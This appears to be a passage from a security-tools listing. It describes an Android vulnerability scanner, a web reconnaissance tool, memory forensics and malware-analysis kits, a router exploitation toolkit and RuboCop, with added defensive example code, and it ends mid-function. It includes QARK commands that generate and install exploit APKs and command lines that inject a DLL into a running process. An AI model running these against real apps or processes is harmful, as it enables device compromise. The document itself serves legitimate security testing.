$ python qark.py --source 1 --pathtoapk /Users/foo/qark/sampleApps/goatdroid/goatdroid.apk --exploit 1 --install 1
or
$ python qark.py --source 2 -c /Users/foo/qark/sampleApps/goatdroid/goatdroid --manifest /Users/foo/qark/sampleApps/goatdroid/goatdroid/AndroidManifest.xml --exploit 1 --install 1

The sampleApps folder contains sample APKs that you can test against QARK.
Requirements

python 2.7.6
JRE 1.6+ (preferably 1.7+)
OSX or Ubuntu Linux (others may work, but are not fully tested)

Documentation

QARK is an easy-to-use tool capable of finding common security vulnerabilities in Android applications. Unlike commercial products, it is 100% free to use. QARK features educational information allowing security reviewers to locate precise, in-depth explanations of the vulnerabilities. QARK automates the use of multiple decompilers, leveraging their combined outputs, to produce superior results when decompiling APKs. Finally, the major advantage QARK has over traditional tools that just point you to possible vulnerabilities is that it can produce ADB commands, or even fully functional APKs, that turn hypothetical vulnerabilities into working "POC" exploits.
Included in the types of security vulnerabilities this tool attempts to find are:
Inadvertently exported components
Improperly protected exported components
Intents which are vulnerable to interception or eavesdropping
Improper X.509 certificate validation
Creation of world-readable or world-writeable files
Activities which may leak data
The use of Sticky Intents
Insecurely created Pending Intents
Sending of insecure Broadcast Intents
Private keys embedded in the source
Weak or improper cryptography use
Potentially exploitable WebView configurations
Exported Preference Activities
Tapjacking
Apps which enable backups
Apps which are debuggable
Apps supporting outdated API versions, with known vulnerabilities
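Several of the checks in the list above (inadvertently exported components, improperly protected exported components, apps that enable backups, debuggable apps) are answered by the manifest alone. The following is an added example, not QARK's own code, of those manifest checks written with the standard library; the sample AndroidManifest.xml is constructed for the example, and the export rules it applies are the platform defaults (an explicit android:exported wins, a component with an intent-filter is exported, and content providers were exported by default before API level 17).

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "service", "receiver", "provider")


def android_attr(name):
    """ElementTree key for an android:<name> attribute."""
    return "{%s}%s" % (ANDROID_NS, name)


def is_exported(component, min_sdk):
    """Apply the platform's default rules for android:exported."""
    explicit = component.get(android_attr("exported"))
    if explicit is not None:
        return explicit == "true"
    if component.find("intent-filter") is not None:
        return True  # implicit export: any app can send a matching intent
    # Content providers were exported by default before API level 17.
    return component.tag == "provider" and min_sdk < 17


def audit_manifest(xml_text):
    """Return (finding, location) pairs for the manifest-level checks."""
    root = ET.fromstring(xml_text)
    findings = []
    sdk = root.find("uses-sdk")
    min_sdk = int(sdk.get(android_attr("minSdkVersion"), "1")) if sdk is not None else 1
    app = root.find("application")
    if app is None:
        return findings
    if app.get(android_attr("debuggable")) == "true":
        findings.append(("debuggable", "application"))
    if app.get(android_attr("allowBackup"), "true") == "true":  # platform default is true
        findings.append(("backups enabled", "application"))
    for comp in app.iter():
        if comp.tag not in COMPONENT_TAGS:
            continue
        where = "%s %s" % (comp.tag, comp.get(android_attr("name")))
        if is_exported(comp, min_sdk) and comp.get(android_attr("permission")) is None:
            findings.append(("exported without permission", where))
    return findings


# Constructed sample manifest exhibiting several of the issues listed above.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.demo">
  <uses-sdk android:minSdkVersion="8" android:targetSdkVersion="19"/>
  <application android:debuggable="true" android:allowBackup="true">
    <activity android:name=".MainActivity" android:exported="true"/>
    <activity android:name=".AdminActivity">
      <intent-filter><action android:name="com.example.ADMIN"/></intent-filter>
    </activity>
    <receiver android:name=".SyncReceiver" android:exported="true"
              android:permission="com.example.SYNC"/>
    <service android:name=".Worker" android:exported="false"/>
  </application>
</manifest>"""

if __name__ == "__main__":
    for finding, where in audit_manifest(SAMPLE_MANIFEST):
        print("%-28s %s" % (finding, where))
```

The receiver is exported but guarded by a permission, so it is not reported; the AdminActivity is reported even though it never says exported="true", which is the "inadvertently exported" case the tool is built to catch.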

Roadmap

Things that are coming soon:

Rewrite of code to support extensibility
Bound Service vulnerability detection and exploitation
Content Provider vulnerability detection and exploitation
Additional WebView configuration demonstrations
Static Tapjacking mitigation detection
File browser capable of using root permissions

Download QARK
RAWR - RAPID ASSESSMENT OF WEB RESOURCES

Features
A customizable CSV containing ordered information gathered for each host, with a field for making notes/etc.
An elegant, searchable, jQuery-driven HTML report that shows screenshots, diagrams, and other information.
A report on relevant security headers, courtesy of SmeegeSec.
A CSV Threat Matrix for an easy view of open ports across all provided hosts. (Use -a to show all ports.)
A wordlist for each host, comprised of all words found in responses (including crawl, if used).
Default password suggestions through checking a service's CPE for matches in the DPE Database.
A shelve database of all host information (planned comparison functionality).
Parses meta-data in documents and photos using customizable modules.
Supports the use of a proxy (Burp, Zap, W3aF).
Captures/stores SSL Certificates, Cookies, and Crossdomain.xml.
[Optional] Customizable crawl of links within the host's domain.
[Optional] PNG Diagram of all pages found during crawl.
[Optional] List of links crawled in tiered format.
[Optional] List of documents seen for each site.
[Optional] Automation-Friendly output (JSON strings).

Input

Using Prior Scan Data

-c <RAWR .cfg file>
.cfg files containing that scan's settings are created for every run.

-f <file, csv list of files, or directory>
It will parse the following formats:
NMap - XML (requires -sV)
Nessus - XML v2 (requires "Service Detection" plugin)
Metasploit - CSV
Qualys - Port Services Report CSV
Qualys - Asset Search XML (requires QIDs 86000,86001,86002)
Nexpose - Simple XML, XML, XML v2
OpenVAS - XML

Using NMap
RAWR accepts valid NMap input strings (CIDR, etc) as an argument.
-i can be used to feed it a line-delimited list.
Use -t <timing> and/or -s <source port>.
Use -p <port|all|fuzzdb> to specify port #(s), all for 1-65353, or fuzzdb to use the FuzzDB Common Ports.
--ssl will call enum-ciphers.nse for more in-depth SSL data.

Enumeration

In [conf/settings.py], 'flist' defines the fields that will be in the CSV as well as the report.
The section at the bottom, "DISABLED COLUMNS", is a list of interesting data points that are not shown by default.

--dns will have it query Bing for other hostnames and add them to the queue.
(Planned) If the IP is non-routable, RAWR will request an AXFR using 'dig'.
This is for external resources; non-routables are skipped.
Results are cached for the duration of the scan to prevent unneeded calls.

-o, -r, and -x make additional calls to grab HTTP OPTIONS, robots.txt, and crossdomain.xml, respectively.

Try --downgrade to make requests with HTTP/1.0.
It is possible to glean more info from the 'chattier' version.
Screenshots are still made via HTTP/1.1, so expect that when viewing the traffic.

--noss will omit the collection of screenshots.
The HTML report still functions, but will show the '!' image for all hosts.

Proxy your requests with --proxy=<ip:port>.
This works well with BurpSuite, Zap, or W3aF.

Crawl the site with --spider, notating files and docs in the log directory's 'maps' folder.
Defaults: [conf/settings.py] follow subdomains, 3 links deep, timeout at 3min, limit to 300 urls.
If graphviz and python-graphviz are installed, it will create a PNG diagram of each site that is crawled.
Start small and make adjustments outward in respect to your scanning environment. Please use caution to avoid trouble. :)

Use -S <1-5> to apply one of the crawl intensity presets. The default is 3.

--mirror is the same as --spider, but will also make a copy of each site during the crawl.

Use --spider-opts <opts> to define crawl settings on the fly.
's' = 'follow subdomains', 'd' = depth, 't' = timeout, 'l' = url limit
Not all are required, nor do they have to be in any particular order.
Example: --spider-opts s:false,d:2,l:500

Also for spidering, --alt-domains <domains> will whitelist domains you want to follow during the crawl.
By default, it won't leave the originating domain.
Example: --alt-domains domain1.com,domain2.com,domain3.com
--blacklist-urls <input list> will blacklist domains you don't want to crawl.

Output

-a is used to include all open ports in the CSV output and the Threat Matrix.

-m will create the Threat Matrix from provided input and exit (no scan).

-d <folder> changes the log folder's location from the default "./"
Example: -d ./Desktop/RAWR_scans_20140227 will create that folder and use it as your log dir.

-q or --quiet mutes display of the dinosaur on run.
Still in disbelief that anyone would want this... made 2 switches for it, to show that I'm a good sport. :)

Compress the log folder when the scan is complete with -z.

--json and --json-min are the automation-friendly outputs from RAWR.
--json only kicks out JSON lines to STDOUT, while still creating all of the normal output files.
--json-min creates no output files, only JSON strings to STDOUT.

Use --parsertest if you're testing a custom parser. It parses input, displays the first 3 lines, and quits.

-v makes output verbose.

Report Customization

-e excludes the 'Default password suggestions' from your output.
This was suggested as an 'Executive' option.

Give your HTML report a custom logo and title with --logo=<file> and --title=<title>.
The image will be copied into the report folder.
Click 'printable' in the HTML report to view the custom header.

Updating

-u runs update and prompts if a file is older than the current version.
Files downloaded are defpass.csv and Ip2Country.tar.gz.
It checks for phantomJS and will download after prompting.

-U runs update and downloads the files mentioned above regardless of their version, without prompting.

Download RAWR
REKALL - THE MOST COMPLETE MEMORY ANALYSIS FRAMEWORK

The Rekall Framework is a completely open collection of tools, implemented in Python under the GNU General Public License, for the extraction of digital artifacts from volatile memory (RAM) samples. The extraction techniques are performed completely independently of the system being investigated but offer visibility into the runtime state of the system. The framework is intended to introduce people to the techniques and complexities associated with extracting digital artifacts from volatile memory samples and to provide a platform for further work into this exciting area of research.
The Rekall distribution is available from: http://www.rekallforensic.com/
Rekall should run on any platform that supports Python (http://www.python.org)
Rekall supports investigations of the following x86 bit memory images:
Microsoft Windows XP Service Pack 2 and 3
Microsoft Windows 7 Service Pack 0 and 1
Linux Kernels 2.6.24 to 3.10.
OSX 10.6-10.8.

Rekall also provides a complete memory sample acquisition capability for all major operating systems (see the tools directory).
Quick start

Rekall is available as a python package installable via the pip package manager. Simply type (for example on Linux):
sudo pip install rekall

You might need to specifically allow pre-release software to be included (until Rekall makes a major stable release):

sudo pip install --pre rekall

This installs all the dependencies. You still need to have python and pip installed first.
To be able to run the ipython notebook, the following are also required:
pip install Jinja2 MarkupSafe Pygments astroid pyzmq tornado wsgiref

For Windows, Rekall is also available as a self-contained installer package. Please check the download page for the most appropriate installer to use.
Development version

For development it is easier to install rekall inside a virtual env. Virtual Env is a way of containing and running multiple versions of python packages at the same time, without interfering with the host system.
# You might need to install virtualenv:
$ sudo apt-get install python-virtualenv
# This will build a new empty python environment.
$ virtualenv /tmp/Test
# Now we switch to the environment - all python code runs from here.
$ source /tmp/Test/bin/activate
# This will install all dependencies into the virtual environment.
$ pip install --pre rekall
# For development run the devel version
$ git clone https://github.com/google/rekall.git
$ cd rekall
$ python setup.py develop

When done you can just remove the /tmp/Test directory.

Download Rekall
REMNUX V6 - A LINUX TOOLKIT FOR REVERSE-ENGINEERING AND ANALYZING MALWARE

REMnux is a free Linux toolkit for assisting malware analysts with reverse-engineering malicious software. It strives to make it easier for forensic investigators and incident responders to start using the variety of freely-available tools that can examine malware, yet might be difficult to locate or set up.
The heart of the project is the REMnux Linux distribution based on Ubuntu. This lightweight distro incorporates many tools for analyzing Windows and Linux malware, examining browser-based threats such as obfuscated JavaScript, exploring suspicious document files and taking apart other malicious artifacts. Investigators can also use the distro to intercept suspicious network traffic in an isolated lab when performing behavioral malware analysis.
Malware Analysis Tools Installed on REMnux

The REMnux distribution includes many free tools useful for examining malicious software. These utilities are set up and tested to make it easier for you to perform malware analysis tasks without needing to figure out how to install them. The majority of these tools are listed below.
Examine Browser Malware
Website analysis: Thug, mitmproxy, Network Miner Free Edition, curl, Wget, Burp Proxy Free Edition, Automater, pdnstool, Tor, tcpextract, tcpflow, passive.py, CapTipper
Flash: xxxswf, SWF Tools, RABCDAsm, extract_swf, Flare
Java: Java Cache IDX Parser, JD-GUI Java Decompiler, JAD Java Decompiler, Javassist, CFR
JavaScript: Rhino Debugger, ExtractScripts, Firebug, SpiderMonkey, V8, JS Beautifier
Examine Document Files
PDF: AnalyzePDF, Pdfobjflow, pdfid, pdf-parser, peepdf, Origami, PDF X-RAY Lite, PDFtk, swf_mastah
Microsoft Office: officeparser, pyOLEScanner.py, oletools, libolecf, oledump, emldump
Shellcode: sctest, unicode2hex-escaped, unicode2raw, dism-this, shellcode2exe
Extract and Decode Artifacts
Deobfuscate: unXOR, XORStrings, ex_pe_xor, XORSearch, brutexor/iheartxor, xortool, NoMoreXOR, XORBruteForcer, Balbuzard
Extract strings: strdeobj, pestr, strings
Carving: Foremost, Scalpel, bulk_extractor, Hachoir
Handle Network Interactions
Sniffing: Wireshark, ngrep, TCPDump, tcpick
Services: FakeDNS, Nginx, fakeMail, Honeyd, INetSim, Inspire IRCd, OpenSSH, accept-all-ips
Miscellaneous network: prettyping.sh, set-static-ip, renew-dhcp, Netcat, EPIC IRC Client, stunnel
Process Multiple Samples
Maltrieve, Ragpicker, Viper, MASTIFF, Density Scout
Examine File Properties and Contents
Define signatures: YaraGenerator, IOCextractor, Autorule, Rule Editor
Scan: Yara, ClamAV, TrID, ExifTool, virustotal-submit, Disitool
Hashes: nsrllookup, Automater, Hash Identifier, totalhash, ssdeep, virustotal-search, VirusTotalApi
Investigate Linux Malware
System: Sysdig, Unhide
Disassemble: Vivisect, Udis86, objdump
Debug: Evans Debugger (EDB), GNU Project Debugger (GDB)
Trace: strace, ltrace
Investigate: Radare 2, Pyew, Bokken, m2elf
Edit and View Files
Text: SciTE, Geany, Vim
Images: feh, ImageMagick
Binary: wxHexEditor, VBinDiff
Documents: Xpdf
Examine Memory Snapshots
Volatility Framework, findaes, AESKeyFinder, RSAKeyFinder, VolDiff, Rekall
Statically Examine PE Files
Unpacking: UPX, Bytehist, Density Scout, PackerID
Disassemble: objdump, Udis86, Vivisect
Find anomalies: Signsrch, pescanner, ExeScan, pev, Peframe, pedump
Investigate: Bokken, RATDecoders, Pyew, readpe.py, PyInstaller Extractor
Investigate Mobile Malware
Androwarn, AndroGuard
Perform Other Tasks
ProcDOT, bashhacks, Docker, vtTool, REMnux Updater, Decompyle++
REMnux Documentation

REMnux documentation is a relatively recent effort, which can provide additional details regarding the toolkit. The document set is in need of improvement and expansion.
The one-page REMnux cheat sheet highlights some of the most useful tools and commands available as part of the REMnux distro. It's an especially nice starting point for people who are new to the distribution.
Malware Analysis Essentials Using REMnux

Download REMnux v6
REMOTE DLL INJECTOR V2.0 - COMMAND-LINE TOOL TO INJECT DLL INTO REMOTE PROCESS

Remote DLL Injector is a free command-line tool to inject a DLL into a remote process. Currently it supports DLL injection using the CreateRemoteThread technique.
Being a command-line tool makes it easy to integrate into your automation scripts. It is also useful when you are remotely operating on the system, especially during pen testing situations.
One of the unique features of Remote DLL Injector is its ability to inject a DLL into ASLR-enabled processes. It dynamically calculates DLL and function offsets within the target process before the injection operation.
It is fully portable and includes both 32-bit and 64-bit versions. It has been successfully tested on all platforms starting from Windows XP to Windows 8.
How to use?

RemoteDLL Injector is a command-line based tool. Hence it must be launched from the cmd prompt as shown below.
Note that it includes 32-bit and 64-bit versions. For injecting a DLL into a 32-bit process (on a 32-bit or 64-bit platform) use RemoteDLLInjector32.exe, and for a 64-bit process use RemoteDLLInjector64.exe.
Here is the simple usage information:
RemoteDLLInjector.exe <pid> <dll_file_path>
  -h               This help screen
  <pid>            Process ID of remote process to inject DLL
  <dll_file_path>  Full path of DLL to be injected

Examples of RemoteDLLInjector
//Show the help screen
RemoteDLLInjector.exe -h
//Inject DLL into 32-bit process with pid 1551
RemoteDLLInjector32.exe 1551 "c:\my project\inject32.dll"
//Inject DLL into 64-bit process with pid 1001
RemoteDLLInjector64.exe 1001 "c:\inject64.dll"

Download Remote DLL Injector

REXT - ROUTER EXPLOITATION TOOLKIT

Small toolkit for easy creation and usage of various python scripts that work with embedded devices.
core - contains most of the toolkit's basic functions
databases - contains databases, like default credentials etc.
interface - contains code that is used for the creation and manipulation of the interface
modules - contains the structure of modules that can be loaded; every module contains vendor-specific sub-modules where scripts are stored:
  decryptors
  exploits
  harvesters
  misc
  scanners
output - output goes here
This is still heavy work-in-progress.
Requirements

I am trying to keep the requirements minimal:

requests

Download REXT
ROUTERCHECK - ANDROID APP TO ENSURE THE SAFETY OF YOUR ROUTER

RouterCheck is a system for ensuring the well-being of your router and home network. It's offered as a smartphone app, but is far more than just a simple smartphone app. RouterCheck communicates with a powerful server that helps to check whether your router is vulnerable to any of the latest attacks that hackers are launching.
RouterCheck is Security for Your Home Router

RouterCheck is easy to use, yet performs some very advanced tests to ensure the safety of your home network. Simply start RouterCheck and the following things will automatically be tested for:
Check your configuration

Routers are complex devices and their configuration is sometimes difficult to understand. The configuration screens have many options, and it isn't always clear what effects choosing an option will have on your network's security. RouterCheck makes sure that you haven't accidentally enabled something dangerous.
Passwords

RouterCheck will check to see whether you've changed your router's default password (very dangerous) or are using a password that's on hackers' lists of common passwords to try. To learn more about password danger click Passwords.
Dangerous things enabled

RouterCheck will see whether you've enabled things that are dangerous such as UPnP or Remote Administration. If you have, RouterCheck will explain the security implications of this so that you can make an informed decision on what to do.
Running the latest firmware

RouterCheck checks that your router is updated with the latest firmware for your model, and if not, what steps you can take to update it.
Vulnerabilities in your router

RouterCheck will look through several lists of known vulnerabilities for your router model/firmware to see whether there are any known problems. It will also perform some of the same tests that hackers use to see how your router will respond.
Open Ports

RouterCheck will see if your network has any ports opened to the internet as a result of Port Forwarding. If there are and you have good reason to have the port opened, you can configure RouterCheck so that it will not flag this situation as an issue in the future.
DNS is set up properly

It's well understood that when hackers attack home networks, the DNS configuration is the first thing they target. It's very important that your DNS is reliable and trustworthy, otherwise all of the computers on your network are at risk. RouterCheck has several ways to check and ensure that the DNS servers that you're using are reliable.
Has the router been tampered with?

RouterCheck will run some tests on your router to help determine if other things in the router have been tampered with by hackers.
Are you a target?

RouterCheck will look to see whether you're on any of the common lists of targets that hackers typically use when looking for devices on the internet that are poorly secured and at risk.
Resolution

When RouterCheck finds that there are any problems with your router, it will help guide you towards the steps you must take to solve the problem.

Checking public WiFi hotspots

Do you ever use WiFi at a coffee shop, restaurant or other public place? The dangers of using public WiFi are well understood, and one of the issues is the reliability of the system's DNS server. If a hacker were successful in compromising a coffee shop router's DNS settings, everyone who used the service would unknowingly become innocent victims.
RouterCheck allows you to quickly scan a public WiFi hotspot to ensure that the system is safe to use.

Download RouterCheck
RUBOCOP - A RUBY STATIC CODE ANALYZER, BASED ON THE COMMUNITY RUBY STYLE GUIDE

RuboCop is a Ruby static code analyzer. Out of the box it will enforce many of the guidelines outlined in the community Ruby Style Guide.

Most aspects of its behavior can be tweaked via various configuration options.

Installation
RuboCop's installation is pretty standard:
$ gem install rubocop

If you'd rather install RuboCop using bundler, don't require it in your Gemfile:
gem 'rubocop', require: false

Basic Usage
Running rubocop with no arguments will check all Ruby source files in the current directory:
$ rubocop

Alternatively you can pass rubocop a list of files and directories to check:
$ rubocop app spec lib/something.rb

Here's RuboCop in action. Consider the following Ruby source code (the misaligned end is intentional; it is one of the offenses reported below):
def badName
  if something
    test
    end
end

Running RuboCop on it (assuming it's in a file named test.rb) would produce the following report:
Inspecting 1 file
W

Offenses:

test.rb:1:5: C: Use snake_case for method names.
def badName
    ^^^^^^^
test.rb:2:3: C: Use a guard clause instead of wrapping the code inside a conditional expression.
  if something
  ^^
test.rb:2:3: C: Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||.
  if something
  ^^
test.rb:4:5: W: end at 4, 4 is not aligned with if at 2, 2
    end
    ^^^

1 file inspected, 4 offenses detected

For more details check the available command-line options:

$ rubocop -h
Command flag             Description
-v/--version             Displays the current version and exits.
-V/--verbose-version     Displays the current version plus the version of Parser and Ruby.
-L/--list-target-files   List all files RuboCop will inspect.
-F/--fail-fast           Inspects in modification time order and stops after first file with offenses.
-C/--cache               Store and reuse results for faster operation.
-d/--debug               Displays some extra debug output.
-D/--display-cop-names   Displays cop names in offense messages.
-c/--config              Run with specified config file.
-f/--format              Choose a formatter.
-o/--out                 Write output to a file instead of STDOUT.
-r/--require             Require Ruby file (see Loading Extensions).
-R/--rails               Run extra Rails cops.
-l/--lint                Run only lint cops.
-a/--auto-correct        Auto-correct certain offenses. Note: Experimental - use with caution.
--only                   Run only the specified cop(s) and/or cops in the specified departments.
--except                 Run all cops enabled by configuration except the specified cop(s) and/or departments.
--auto-gen-config        Generate a configuration file acting as a TODO list.
--exclude-limit          Limit how many individual files --auto-gen-config can list in Exclude parameters, default is 15.
--show-cops              Shows available cops and their configuration.
--fail-level             Minimum severity for exit with error code. Full severity name or upper case initial can be given. Normally, auto-corrected offenses are ignored. Use A or autocorrect if you'd like them to trigger failure.
-s/--stdin               Pipe source from STDIN. This is useful for editor integration.

Cops

In RuboCop lingo the various checks performed on the code are called cops. There are several cop departments.
You can also load custom cops.
Style
Most of the cops in RuboCop are so-called style cops that check for stylistic problems in your code. Almost all of them are based on the Ruby Style Guide. Many of the style cops have configuration options allowing them to support different popular coding conventions.
Lint
Lint cops check for possible errors and very bad practices in your code. RuboCop implements in a portable way all built-in MRI lint checks (ruby -wc) and adds a lot of extra lint checks of its own. You can run only the lint cops like this:
$ rubocop -l

The -l / --lint option can be used together with --only to run all the enabled lint cops plus a selection of other cops.
Disabling any of the lint cops is generally a bad idea.
Metrics
Metrics cops deal with properties of the source code that can be measured, such as class length, method length, etc. Generally speaking, they have a configuration parameter called Max, and when running rubocop --auto-gen-config this parameter will be set to the highest value found for the inspected code.
Rails
Rails cops are specific to the Ruby on Rails framework. Unlike style and lint cops they are not used by default and you have to request them specifically:
$ rubocop -R

or add the following directive to your .rubocop.yml:

AllCops:
  RunRailsCops: true

Configuration
The behavior of RuboCop can be controlled via the .rubocop.yml configuration file. It makes it possible to enable/disable certain cops (checks) and to alter their behavior if they accept any parameters. The file can be placed either in your home directory or in some project directory. RuboCop will start looking for the configuration file in the directory where the inspected file is and continue its way up to the root directory.
The file has the following format:

inherit_from: ../.rubocop.yml
Style/Encoding:
  Enabled: false
Metrics/LineLength:
  Max: 99

Note: Qualifying cop name with its type, e.g., Style, is recommended, but not necessary as long as the cop name is unique across all types.

Inheritance

RuboCop supports inheriting configuration from one or more supplemental configuration files at runtime.

Inheriting from another configuration file in the project
The optional inherit_from directive is used to include configuration from one or more files. This makes it possible to have the common project settings in the .rubocop.yml file at the project root, and then only the deviations from those rules in the subdirectories. The files can be given with absolute paths or paths relative to the file where they are referenced. The settings after an inherit_from directive override any settings in the file(s) inherited from. When multiple files are included, the first file in the list has the lowest precedence and the last one has the highest. The format for multiple inheritance is:

inherit_from:
  - ../.rubocop.yml
  - ../conf/.rubocop.yml

Inheriting configuration from a dependency gem
The optional inherit_gem directive is used to include configuration from one or more gems external to the current project. This makes it possible to inherit a shared dependency's RuboCop configuration that can be used from multiple disparate projects.
Configurations inherited in this way will be essentially prepended to the inherit_from directive, such that the inherit_gem configurations will be loaded first, then the inherit_from relative file paths will be loaded (overriding the configurations from the gems), and finally the remaining directives in the configuration file will supersede any of the inherited configurations. This means the configurations inherited from one or more gems have the lowest precedence of inheritance.
The directive should be formatted as a YAML Hash using the gem name as the key and the relative path within the gem as the value:

inherit_gem:
  rubocop: config/default.yml
  my-shared-gem: .rubocop.yml
  cucumber: conf/rubocop.yml

Note: If the shared dependency is declared using a Bundler Gemfile and the gem was installed using bundle install, it would be necessary to also invoke RuboCop using Bundler in order to find the dependency's installation path at runtime:

$ bundle exec rubocop <options...>
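
The precedence described above (inherit_gem lowest, then inherit_from files in list order, then the file's own directives) worked through as an added Ruby example that is not RuboCop's own code. It resolves constructed in-memory YAML instead of real files (the gem lookup is a stand-in map, and my-shared-gem is a hypothetical gem name), and then lists which Lint cops the merged result leaves disabled, since an inherited file can switch those off without the project noticing.

```ruby
require 'yaml'

# Constructed stand-in for a config file shipped inside a gem.
SHARED_GEM_YML = <<~YAML
  Metrics/LineLength:
    Max: 80
  Lint/UselessAssignment:
    Enabled: true
  Style/Encoding:
    Enabled: true
YAML

# Constructed stand-in for ../.rubocop.yml one directory up.
PARENT_YML = <<~YAML
  Metrics/LineLength:
    Max: 100
  Lint/UselessAssignment:
    Enabled: false
YAML

# Constructed project .rubocop.yml that inherits from both.
PROJECT_YML = <<~YAML
  inherit_gem:
    my-shared-gem: .rubocop.yml
  inherit_from:
    - ../.rubocop.yml
  Metrics/LineLength:
    Max: 120
YAML

# Stand-in for the filesystem and gem lookup: path => file contents.
# (Real RuboCop resolves the gem path through RubyGems; this example does not.)
SOURCES = {
  'gem:my-shared-gem/.rubocop.yml' => SHARED_GEM_YML,
  '../.rubocop.yml' => PARENT_YML
}.freeze

# Recursive merge where keys in +over+ win. Nested cop parameter hashes are
# merged rather than replaced, so Max and Enabled may come from different files.
def deep_merge(base, over)
  base.merge(over) do |_key, old, new|
    old.is_a?(Hash) && new.is_a?(Hash) ? deep_merge(old, new) : new
  end
end

def load_yml(text)
  YAML.safe_load(text) || {}
end

# Returns the effective configuration after applying inheritance.
def resolve_config(project_yml, sources)
  own = load_yml(project_yml)
  gems = own.delete('inherit_gem') || {}
  parents = Array(own.delete('inherit_from'))

  merged = {}
  # 1. gem configs: lowest precedence, in the order listed
  gems.each do |gem_name, rel_path|
    merged = deep_merge(merged, load_yml(sources.fetch("gem:#{gem_name}/#{rel_path}")))
  end
  # 2. inherit_from files: first listed has lowest precedence, last highest
  parents.each { |path| merged = deep_merge(merged, load_yml(sources.fetch(path))) }
  # 3. the file's own directives supersede everything inherited
  deep_merge(merged, own)
end

# Lint cops that end up disabled after the merge, so a reviewer sees them
# explicitly instead of discovering missing findings later.
def disabled_lint_cops(config)
  config.select do |cop, params|
    cop.start_with?('Lint/') && params.is_a?(Hash) && params['Enabled'] == false
  end.keys.sort
end

if __FILE__ == $PROGRAM_NAME
  cfg = resolve_config(PROJECT_YML, SOURCES)
  puts "Metrics/LineLength Max => #{cfg['Metrics/LineLength']['Max']}"  # 120, from the project file
  puts "Disabled lint cops: #{disabled_lint_cops(cfg).inspect}"         # from ../.rubocop.yml
end
```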

Defaults

The file config/default.yml under the RuboCop home directory contains the default settings that all configurations inherit from. Project and personal .rubocop.yml files need only make settings that are different from the default ones. If there is no .rubocop.yml file in the project or home directory, config/default.yml will be used.

Including/Excluding files

RuboCop checks all files found by a recursive search starting from the directory it is run in, or directories given as command line arguments. However, it only recognizes files ending with .rb or extensionless files with a #!.*ruby declaration as Ruby files. Hidden directories (i.e., directories whose names start with a dot) are not searched by default. If you'd like it to check files that are not included by default, you'll need to pass them in on the command line, or to add entries for them under AllCops/Include. Files and directories can also be ignored through AllCops/Exclude.
Here is an example that might be used for a Rails project:

AllCops:
  Include:
    - '**/Rakefile'
    - '**/config.ru'
  Exclude:
    - 'db/**/*'
    - 'config/**/*'
    - 'script/**/*'
    - !ruby/regexp /old_and_unused\.rb$/
# other configuration
# ...

Files and directories are specified relative to the .rubocop.yml file.
Note: Patterns that are just a file name, e.g. Rakefile, will match that file name in any directory, but this pattern style is deprecated. The correct way to match the file in any directory, including the current, is **/Rakefile.
Note: The pattern config/** will match any file recursively under config, but this pattern style is deprecated and should be replaced by config/**/*.
Note: The Include and Exclude parameters are special. They are valid for the directory tree starting where they are defined. They are not shadowed by the setting of Include and Exclude in other .rubocop.yml files in subdirectories. This is different from all other parameters, which follow RuboCop's general principle that configuration for an inspected file is taken from the nearest .rubocop.yml, searching upwards.
Cops can be run only on specific sets of files when that's needed (for instance you might want to run some Rails model checks only on files whose paths match app/models/*.rb). All cops support the Include param.

Rails/DefaultScope:
  Include:
    - app/models/*.rb

Cops can also exclude only specific sets of files when that's needed (for instance you might want to run some cop only on a specific file). All cops support the Exclude param.

Rails/DefaultScope:
  Exclude:
    - app/models/problematic.rb

Generic configuration parameters

In addition to Include and Exclude, the following parameters are available for every cop.

Enabled
Specific cops can be disabled by setting Enabled to false for that specific cop.

Metrics/LineLength:
  Enabled: false

Most cops are enabled by default. Some cops, configured in config/disabled.yml, are disabled by default. The cop enabling process can be altered by setting DisabledByDefault to true.

AllCops:
  DisabledByDefault: true

All cops are then disabled by default, and only cops appearing in user configuration files are enabled. Enabled: true does not have to be set for cops in user configuration. They will be enabled anyway.

Severity
Each cop has a default severity level based on which department it belongs to. The level is warning for Lint and convention for all the others. Cops can customize their severity level. Allowed params are refactor, convention, warning, error and fatal.
There is one exception from the general rule above and that is Lint/Syntax, a special cop that checks for syntax errors before the other cops are invoked. It can not be disabled and its severity (fatal) can not be changed in configuration.

Metrics/CyclomaticComplexity:
  Severity: warning

AutoCorrect
Cops that support the --auto-correct option can have that support disabled. For example:

Style/PerlBackrefs:
  AutoCorrect: false

Automatically Generated Configuration

If you have a code base with an overwhelming amount of offenses, it can be a good idea to use rubocop --auto-gen-config and add an inherit_from: .rubocop_todo.yml in your .rubocop.yml. The generated file .rubocop_todo.yml contains configuration to disable cops that currently detect an offense in the code by excluding the offending files, or disabling the cop altogether once a file count limit has been reached.
By adding the option --exclude-limit COUNT, e.g., rubocop --auto-gen-config --exclude-limit 5, you can change how many files are excluded before the cop is entirely disabled. The default COUNT is 15.
Then you can start removing the entries in the generated .rubocop_todo.yml file one by one as you work through all the offenses in the code.

Disabling Cops within Source Code

One or more individual cops can be disabled locally in a section of a file by adding a comment such as

# rubocop:disable Metrics/LineLength, Style/StringLiterals
[...]
# rubocop:enable Metrics/LineLength, Style/StringLiterals

You can also disable all cops with

# rubocop:disable all
[...]
# rubocop:enable all

One or more cops can be disabled on a single line with an end-of-line comment.

for x in (0..19) # rubocop:disable Style/AvoidFor
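
A small scanner for the disable/enable comments described above, added here as an example and not part of RuboCop. It distinguishes block directives from end-of-line ones (which only scope to their own line) and reports cops that a block directive switches off but never switches back on before end of file, which is how a Lint cop quietly stops covering the rest of a file. SAMPLE_SOURCE is constructed input.

```ruby
# Matches "# rubocop:disable Cop1, Cop2" or "# rubocop:enable ..." anywhere on a line.
DIRECTIVE_RE = /#\s*rubocop:(disable|enable)\s+([^\n]+?)\s*$/

# Returns one hash per directive: line number, :disable or :enable, the cop
# names listed, and whether code precedes the comment (end-of-line directive).
def parse_directives(source)
  source.each_line.with_index(1).map do |line, lineno|
    m = DIRECTIVE_RE.match(line)
    next unless m
    code_before = line[0...m.begin(0)].strip
    { line: lineno,
      action: m[1].to_sym,
      cops: m[2].split(',').map(&:strip),
      inline: !code_before.empty? }
  end.compact
end

# Cops disabled by a block directive and still disabled at end of file,
# as { cop_name => line_where_disabled }.
# Simplification: "enable all" re-enables everything; other names are
# matched literally against the name used in the disable directive.
def unclosed_disables(source)
  open = {}
  parse_directives(source).each do |d|
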